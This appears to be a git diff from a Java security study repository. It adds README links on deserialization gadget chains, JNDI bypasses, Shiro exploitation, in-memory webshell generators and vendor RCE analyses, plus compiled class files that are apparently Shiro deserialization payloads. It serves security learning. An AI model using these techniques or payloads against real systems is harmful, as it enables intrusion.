"a/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/ser/Ser01.java" "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/ser/Ser01.java" new file mode 100644 index 0000000..db80041 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/ser/Ser01.java" @@ -0,0 +1,4 @@ +package ser; + +public class Ser01 { +} diff --git a/README.md b/README.md index 850e8da..190e49d 100644 --- a/README.md +++ b/README.md @@ -16,11 +16,12 @@ - [高版本jdk下的链子](#高版本jdk下的链子) - [表达式+SSTI](#表达式+SSTI) - [RASP](#RASP) -- [SpringBoot](#SpringBoot) +- [Spring系列](#Spring系列) - [工具开发/二开](#devTools) - [代码审计](#CodeAudit) - [代码审计辅助工具](#代码审计辅助工具) -- [学习路线整合](#学习路线整合) +- [参考学习路线](#参考学习路线) +- [博客&公众号整理](#博客整理) - [工具推荐](#工具推荐) @@ -91,7 +92,17 @@ # JavaWeb基础 -待完善。。。 +## JavaWeb常见漏洞 + +### XXE + +[XXE外部实体注入漏洞的测试和修复——Java_xxe漏洞的两种修复方法-CSDN博客](https://blog.csdn.net/jian876601394/article/details/107610681) 列举了很多漏洞函数 + +[Java XXE漏洞原理研究 - 郑瀚 - 博客园](https://www.cnblogs.com/LittleHann/p/17776458.html) + +[一篇文章带你深入理解漏洞之 XXE 漏洞-先知社区](https://xz.aliyun.com/news/2994) 虽然不针对Java,但是写的很完整 + + @@ -119,14 +130,14 @@ - -
# 反序列化 +一开始可以只看CC链 + ## CC链 CC链是Java反序列化的开始,每个人都应该好好学习。 @@ -137,7 +148,13 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [Java 反序列化漏洞(二) - Commons Collections | 素十八](https://su18.org/post/ysoserial-su18-2/#commonscollections1) su18师傅的反序列化取经路 -=========================快速入门的话,可以只看上面的CC链========================= +=========================快速入门的话,可以只看上面的========================= + +[CC链再次挖掘-先知社区](https://xz.aliyun.com/news/14431) 可以尝试一下自己能不能找到其他类利用 + +[CC链再挖掘 | 1diot9's Blog](https://1diot9.github.io/2025/10/27/CC链再挖掘/) 基于上面的文章,着重于如何审计 + +[java反序列化漏洞commons-collections3.2.1TransformedList触发transform-先知社区](https://xz.aliyun.com/news/13748)
@@ -149,6 +166,14 @@ CC链是Java反序列化的开始,每个人都应该好好学习。
+## 利用链探测 + +[构造java探测class反序列化gadget | 回忆飘如雪](https://gv7.me/articles/2021/construct-java-detection-class-deserialization-gadget/#0x01-背景) 实战下利用链探测,dns法,反序列化炸弹延时法 + +[Java序列化炸弹解析-CSDN博客](https://blog.csdn.net/nevermorewo/article/details/100100048) + +
+ ## 其他链子&姿势 [Java反序列化之C3P0链 | Drunkbaby's Blog](https://drun1baby.top/2022/10/06/Java反序列化之C3P0链/) c3p0,可以打二次反序列化 @@ -179,39 +204,75 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 =========================快速入门的话,可以先只看上面部分的========================= -
+## RMI、JRMP、JEP290、LDAP -## 高版本JDK绕过 +这里的目标是: -### 基于BeanFactory +1、搞清楚RMI的通信流程,搞清楚Server,Registry,Client三者互相的打法 -[探索高版本 JDK 下 JNDI 漏洞的利用方法 - 跳跳糖](https://tttang.com/archive/1405/#toc_0x01-beanfactory) 除了最基本的EL表达式执行,还有Snakeyaml,XStream等方式(高版本tomcat的forceString被禁) +2、了解JRMP在RMI中的作用,知道它和DGC的关系 -
+3、了解两次JEP290的防护和绕过,JEP290(8u121~8u230),JEP290(>8u231) -### 其他Factory绕过 +4、了解JNDI的基本打法,包括codebase远程加载,ldap发送反序列化数据,reference本地工厂(BeanFactory为例) -[SolarWinds Security Event Manager AMF 反序列化 RCE (CVE-2024-0692) - X1r0z Blog](https://exp10it.io/2024/03/solarwinds-security-event-manager-amf-deserialization-rce-cve-2024-0692/#hikaricp-jndi-注入) Hikari跟Druid一样,都可以实现JNDI+JDBC,都是可以执行初始化sql语句 +[RMI JRMP JEP290 LDAP基础梳理 | 1diot9's Blog](https://1diot9.github.io/2025/11/10/RMI-JRMP-JEP290-LDAP基础梳理/) 我这篇写的比较完整,但是不会过于全面,可以先看 -[高版本JNDI注入-高版本Tomcat利用方案-先知社区](https://xz.aliyun.com/news/16156) +下面整理当时看的部分文章 -[探索高版本 JDK 下 JNDI 漏洞的利用方法 - 跳跳糖](https://tttang.com/archive/1405/#toc_snakeyaml) jdk17的题特别喜欢考JNDI+JDBC +### 整合类 -[JNDI jdk高版本绕过—— Druid-先知社区](https://xz.aliyun.com/news/10104) +[奇安信攻防社区-JAVA JRMP、RMI、JNDI、反序列化漏洞之间的风花雪月](https://forum.butian.net/share/2278) 这个感觉最清楚,底下的参考文章也看看 -
+[基于Java反序列化RCE - 搞懂RMI、JRMP、JNDI-先知社区](https://xz.aliyun.com/news/6675) + +[搞懂RMI、JRMP、JNDI-终结篇-先知社区](https://xz.aliyun.com/news/6860) 里面提到的文章也要看 -## 未分类 +### RMI -[RMI协议分析 - lvyyevd's 安全博客](http://www.lvyyevd.cn/archives/rmi-xie-yi-fen-xi) +[RMI协议分析 - lvyyevd's 安全博客](http://www.lvyyevd.cn/archives/rmi-xie-yi-fen-xi) -[Java RMI 攻击由浅入深 | 素十八](https://su18.org/post/rmi-attack/) +[Java RMI 攻击由浅入深 | 素十八](https://su18.org/post/rmi-attack/) + +[RMI-攻击方式总结-安全KER - 安全资讯平台](https://www.anquanke.com/post/id/257452#h2-6) 有比较完整的示例代码 [MyJavaSecStudy/docs/Java安全漫谈.pdf at main · 1diot9/MyJavaSecStudy](https://github.com/1diot9/MyJavaSecStudy/blob/main/docs/Java安全漫谈.pdf) 04-06详细讲了RMI的通信过程 +### JRMP&JEP290 + +[JRMP通信攻击过程及利用介绍-先知社区](https://xz.aliyun.com/news/15240) + +[RMI-JEP290的分析与绕过-安全KER - 安全资讯平台](https://www.anquanke.com/post/id/259059#h2-0) + +[Shiro有key但无回显利用链子-JRMP大法_shiro有key无链怎么办?-CSDN博客](https://blog.csdn.net/weixin_43264067/article/details/139626398) 可以通过jrmp进行利用链探测 + +
+ +## 高版本JDK绕过 + +### 基于反序列化 + +[RMI JRMP JEP290 LDAP基础梳理 | 1diot9's Blog](https://1diot9.github.io/2025/11/10/RMI-JRMP-JEP290-LDAP基础梳理/) 5.1.1和5.2.2有讲 + +### 基于BeanFactory + +[探索高版本 JDK 下 JNDI 漏洞的利用方法 - 跳跳糖](https://tttang.com/archive/1405/#toc_0x01-beanfactory) 除了最基本的EL表达式执行,还有Snakeyaml,XStream等方式(高版本tomcat的forceString被禁) + +
+ +### 其他Factory绕过 + [京麟CTF 2024 ezldap 分析-先知社区](https://xz.aliyun.com/news/14103) com.sun.jndi.ldap.object.trustSerialData false的绕过 -[奇安信攻防社区-【2024补天白帽黑客大会】JNDI新攻击面探索](https://forum.butian.net/share/3857) +[SolarWinds Security Event Manager AMF 反序列化 RCE (CVE-2024-0692) - X1r0z Blog](https://exp10it.io/2024/03/solarwinds-security-event-manager-amf-deserialization-rce-cve-2024-0692/#hikaricp-jndi-注入) Hikari跟Druid一样,都可以实现JNDI+JDBC,都是可以执行初始化sql语句 + +[高版本JNDI注入-高版本Tomcat利用方案-先知社区](https://xz.aliyun.com/news/16156) + +[探索高版本 JDK 下 JNDI 漏洞的利用方法 - 跳跳糖](https://tttang.com/archive/1405/#toc_snakeyaml) jdk17的题特别喜欢考JNDI+JDBC + +[JNDI jdk高版本绕过—— Druid-先知社区](https://xz.aliyun.com/news/10104) + +[奇安信攻防社区-【2024补天白帽黑客大会】JNDI新攻击面探索](https://forum.butian.net/share/3857)
@@ -299,10 +360,16 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [奇安信攻防社区-一种另类的shiro检测方式](https://forum.butian.net/share/92) +payload缩短这部分内容挺多的,感觉能单独研究了。 + [Shiro绕过Header长度限制进阶利用 | Bmth's blog](http://www.bmth666.cn/2024/11/03/Shiro绕过Header长度限制进阶利用/index.html) 里面提到的文章都要看 +[浅谈Shiro550受Tomcat Header长度限制影响突破](https://y4tacker.github.io/2022/04/14/year/2022/4/浅谈Shiro550受Tomcat-Header长度限制影响突破/) 这里提供了其他缩短的方法 + [终极Java反序列化Payload缩小技术](https://mp.weixin.qq.com/s/cQCYhBkR95vIVBicA9RR6g) + +
## shiro越权 @@ -387,6 +454,10 @@ CC链是Java反序列化的开始,每个人都应该好好学习。
+### 其他内存马 + +[Lilctf_blade_cc](https://www.n1ght.cn/2025/08/21/blade_cc/#blade内存马) blade内存马 + ### 内存马工具 [pen4uin/java-memshell-generator: 一款支持自定义的 Java 内存马生成工具|A customizable Java in-memory webshell generation tool.](https://github.com/pen4uin/java-memshell-generator) @@ -399,6 +470,8 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [pen4uin/java-echo-generator: 一款支持自定义的 Java 回显载荷生成工具|A customizable Java echo payload generation tool.](https://github.com/pen4uin/java-echo-generator) 回显技术的工具 +[java_linux通用回显马](https://www.n1ght.cn/2025/08/21/java_linux通用回显马/) +
@@ -455,21 +528,39 @@ CC链是Java反序列化的开始,每个人都应该好好学习。
-# SpringBoot +# 中间件相关 + +## Tomcat + +[Tomcat URL解析差异性导致的安全问题-先知社区](https://xz.aliyun.com/news/7139) + +## Resin + +[URL解析导致的鉴权绕过问题探究-Resin篇 - 进阶的胖闹-pwnull](https://pwnull.github.io/2023/from-urlparser-to-authbypass-resin/) + +# Spring系列 + +## SpringBoot [LandGrey/SpringBootVulExploit: SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list](https://github.com/LandGrey/SpringBootVulExploit) 总结了SpringBoot的常见利用方式
-## 源码分析 +### 源码分析 [DispatcherServlet.doDispatch请求分发详解 | Godown_blog](https://godownio.github.io/2025/03/25/spring-dispatcherservlet-xiang-jie/) +
+### URL解析差异 + +[URL解析导致的鉴权绕过问题探究-SpringSecurity篇 - 进阶的胖闹-pwnull](https://pwnull.github.io/2023/from-urlparser-to-authbypass-SpringSecurity/) + +[7. JEECG-灰盒Fuzzing](https://www.yuque.com/pmiaowu/gpy1q8/gl653fmytz1hoyev)
-## heapdump分析 +### heapdump分析 主要是jdk自带的VisualVM看jdk版本,heapdump_tools分析依赖和密码 @@ -481,15 +572,17 @@ CC链是Java反序列化的开始,每个人都应该好好学习。
-## 文件缓存机制 +### 文件缓存机制 [从JDBC MySQL不出网攻击到spring临时文件利用-先知社区](https://xz.aliyun.com/news/17830) - -
+## Spring Cloud + +[Spring Cloud GateWay CVE-2025-41243 分析-先知社区](https://xz.aliyun.com/news/19006) +[CVE-2025-41243 Spring Cloud Gateway SpEL 沙箱从任意属性访问到任意文件下载 - 白帽酱の博客](https://rce.moe/2025/09/29/CVE-2025-41243/) # 工具开发/二开 @@ -551,14 +644,24 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [用友U8Cloud环境搭建 | 1diot9's Blog](https://1diot9.github.io/2025/08/16/U8Cloud环境搭建/) +[用友U8Cloud最新前台RCE漏洞挖掘过程分享](https://mp.weixin.qq.com/s/gwdzmBCu5PjYdzVeWEcpDQ) + [用友U8cloud-esnserver接口RCE | 1diot9's Blog](https://1diot9.github.io/2025/08/16/用友U8cloud-esnserver接口RCE/) [用友U8cloud-ServiceDispacherServlet反序列化 | 1diot9's Blog](https://1diot9.github.io/2025/08/16/用友U8cloud-ServiceDispacherServlet反序列化/) -[微信公众平台](https://mp.weixin.qq.com/s/gwdzmBCu5PjYdzVeWEcpDQ) - [用友U8cloud-LoginVideoServlet接口反序列化 | 1diot9's Blog](https://1diot9.github.io/2025/08/16/用友U8cloud-LoginVideoServlet接口反序列化/) +## 契约锁 + +[契约锁电子签章系统 pdfverifier rce 前台漏洞分析(从源码分析)-先知社区](https://xz.aliyun.com/news/18520) + +[契约锁pdfverifier RCE攻防绕过史](https://mp.weixin.qq.com/s/u--mcFjhYly74q-Qg3D7jQ) + +[契约锁电子签章系统 pdfverifier 远程代码执行漏洞分析(补丁包逆向分析)-先知社区](https://xz.aliyun.com/news/18482) + +[契约锁代码审计分析_契约锁漏洞-CSDN博客](https://blog.csdn.net/baidu_25299117/article/details/139990814) +
# 代码审计辅助工具 @@ -587,6 +690,16 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [1. 案例-CodeQL自动化挖掘JavaSecCode](https://www.yuque.com/pmiaowu/gpy1q8/upavb10n5vnit3y3) +[使用CodeQL_n1ght进行漏洞审计思路-先知社区](https://xz.aliyun.com/news/18769) 实战审计例子,有空看看 + +[codeql带依赖jar包数据库生成](https://www.n1ght.cn/2025/06/16/codeql带依赖jar包数据库生成/) + +[CodeQL踩坑日记and规则分享](https://mp.weixin.qq.com/s/cOXc0MyDXhslTPBENfd4Pg) + +[CodeQL分析java反序列化gadget第一期--CC1链-先知社区](https://xz.aliyun.com/news/18578) + +[聊一聊 CodeQL 基础之过河问题](https://mp.weixin.qq.com/s/CCwWUrRa0K_hcBYEaAe8xQ) + [利用Github Actions生成CodeQL数据库 -- 以AliyunCTF2024 Chain17的反序列化链挖掘为例 - KingBridge - 博客园](https://www.cnblogs.com/kingbridge/articles/18100619) [aliyun ctf chain17 回顾(超详细解读)-先知社区](https://xz.aliyun.com/news/16179) @@ -611,7 +724,7 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 -# 学习路线整合 +# 参考学习路线 这里是其他师傅整理的学习路线,我这里仅列举了我看过的一些,如果有其他推荐的,可以私聊我 @@ -631,25 +744,37 @@ CC链是Java反序列化的开始,每个人都应该好好学习。
-# 博客&公众号整理 +# 博客&公众号整理 -整理一些我经常看的博客和公众号,仅根据个人主观收录,可能有很多其他优秀的没收录 +整理一些我经常看的博客和公众号。由于个人见识有些,可能有很多其他优秀的博客和公众号没收录 ## 博客 -[Archives | Bmth's blog](http://www.bmth666.cn/archives/) +[Archives | Bmth's blog](http://www.bmth666.cn/archives/) -[Y4tacker:Hacking The World!](https://y4tacker.github.io/) +[Y4tacker:Hacking The World!](https://y4tacker.github.io/) +[All Posts - X1r0z Blog](https://exp10it.io/posts/) +[Jasper_sec](https://jaspersec.top/) +[真爱和自由 的个人主页-先知社区](https://xz.aliyun.com/users/141946/news) +[Archives - Boogiepop Doesn't Laugh](https://boogipop.com/archives/) + +
## 公众号 漫漫安全路 +珂技知识分享 里面还有pwn入门文章 + +菜狗安全 +Heihu Share + +
# 工具推荐 diff --git a/shiro/.idea/shiro.iml b/shiro/.idea/shiro.iml new file mode 100644 index 0000000..79c6a37 --- /dev/null +++ b/shiro/.idea/shiro.iml @@ -0,0 +1,16 @@ + + + + + + + + + + + \ No newline at end of file diff --git a/shiro/python/.idea/python.iml b/shiro/python/.idea/python.iml new file mode 100644 index 0000000..f571432 --- /dev/null +++ b/shiro/python/.idea/python.iml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/shiro/shiroDeser/BadInterceptor_within.class b/shiro/shiroDeser/BadInterceptor_within.class new file mode 100644 index 0000000000000000000000000000000000000000..9fc38250ff0646cbf90c6d3b1d0dfcae23a38945 GIT binary patch literal 11812 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 literal 0 HcmV?d00001 diff --git a/shiro/shiroDeser/Calc.class b/shiro/shiroDeser/Calc.class new file mode 100644 index 0000000000000000000000000000000000000000..8580c8fd714d9cde610804b9847d748c47077bc0 GIT binary patch literal 742 zcmZuuO>fgc6r4>$)-eu^Q<6doltQ6NE0GJgR9q^M5QZXB1##TCOS-LVM~(x%@@qJA zp$H_n^P_-SCrWd`l6U=P-+a9F??2yv0(gvF7cN>Z)^W?hZM)x**pRsEqKr)k_ayF1 zYzdV2Ol-0z0>yS`AW+&*jOm5!XrNMK>p3WR&CQ{m}LHO{%Y{f2VVp**n0U0Nm9;+ieF4Y8T zmz0Cyi4HRX{}P(32)HAiEs93FGn;(b$kC^; zY_8!7o3F9C#UBr1CGJ%U*C64;A?{*@CrwKFIqs87an!NO{W{+o3V*o>iH2R874p^= zao*FxGS+MqXCCE+jlz7hD4?*nh|=U27^*@;kLEUJlXf=7Y(^W;XJySL3PJA4t72Ke F&3~KVkJA7E literal 0 HcmV?d00001 diff --git a/shiro/shiroDeser/SimpleInterceptor.class b/shiro/shiroDeser/SimpleInterceptor.class new file mode 100644 index 0000000000000000000000000000000000000000..7a9bf298a03dc498df69f985d03e31c14e57c4a8 GIT binary patch literal 4750 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 